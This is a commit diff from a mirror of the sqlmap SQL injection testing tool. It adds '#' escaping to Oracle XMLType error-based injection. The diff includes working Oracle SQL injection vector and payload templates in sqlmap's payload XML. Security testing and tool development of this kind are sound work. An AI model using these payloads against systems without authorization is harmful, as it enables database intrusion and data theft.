mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Oracle's XMLType doesn't like '#' char too
This commit is contained in:
parent
761ec7529a
commit
ac5a752b12
|
@ -217,7 +217,8 @@ class Agent:
|
||||||
_ = (
|
_ = (
|
||||||
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
|
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
|
||||||
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
||||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
|
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
||||||
|
("[HASH_REPLACE]", kb.chars.hash_)
|
||||||
)
|
)
|
||||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
||||||
|
|
||||||
|
|
|
@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
|
||||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||||
kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
|
kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
|
||||||
kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
|
kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
|
||||||
kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
|
|
||||||
kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
|
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
|
||||||
kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
|
|
||||||
|
|
||||||
if flushAll:
|
if flushAll:
|
||||||
kb.headerPaths = {}
|
kb.headerPaths = {}
|
||||||
|
|
|
@ -180,7 +180,7 @@ def __errorReplaceChars(value):
|
||||||
retVal = value
|
retVal = value
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
|
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
|
|
@ -1242,7 +1242,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user